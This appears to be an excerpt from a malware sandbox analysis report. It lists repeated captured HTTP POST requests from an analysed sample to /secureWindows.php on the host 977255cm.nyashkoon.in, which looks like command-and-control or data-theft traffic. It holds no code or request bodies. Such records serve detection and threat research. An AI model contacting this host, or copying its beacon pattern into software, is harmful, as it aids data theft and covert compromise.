                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
